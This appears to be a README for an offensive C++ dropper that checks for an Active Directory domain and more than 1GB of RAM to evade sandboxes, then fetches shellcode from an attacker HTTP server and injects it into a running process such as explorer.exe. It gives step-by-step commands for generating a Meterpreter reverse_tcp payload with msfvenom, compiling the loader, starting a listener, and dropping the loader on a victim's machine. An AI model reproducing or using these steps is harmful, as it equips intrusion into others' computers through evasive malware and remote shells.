This is a dropper written in C++ that checks if:
- If the machine is part of an Active Directory domain.
- If the total physical RAM is higher than 1GB.
It will then do an outbound request to a specified IP (10.10.10.10 here), sleep for 100 seconds, before fetching a payload, and executing it in a remote process specified by its PID.
- Generate the shellcode using metasploit:
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[YOUR_IP] LPORT=5555 -f raw -o index.raw-
Start an HTTP server, which will be used for downloading the shellcode we just generated.
-
Update the loader source code. Elements that need to change are:
- IP and port of your HTTP server.
- Size of the shellcode.
- Compile the loader. The PID of the process being injected need to be specified. It could be the one of
explorer.exe.
$ x86_64-w64-mingw32-g++ main.cpp -o run -lurlmon -lnetapi32 -lwinhttp -static -static-libgcc -static-libstdc++ -DPID=5844- Set up your meterpreter listener:
$ msfconsole
$ set payload windows/x64/meterpreter/reverse_tcp
$ set LHOST [YOUR_IP]
$ set LPORT 5555
$ exploit- Drop the loader on the victim's machine, and execute it.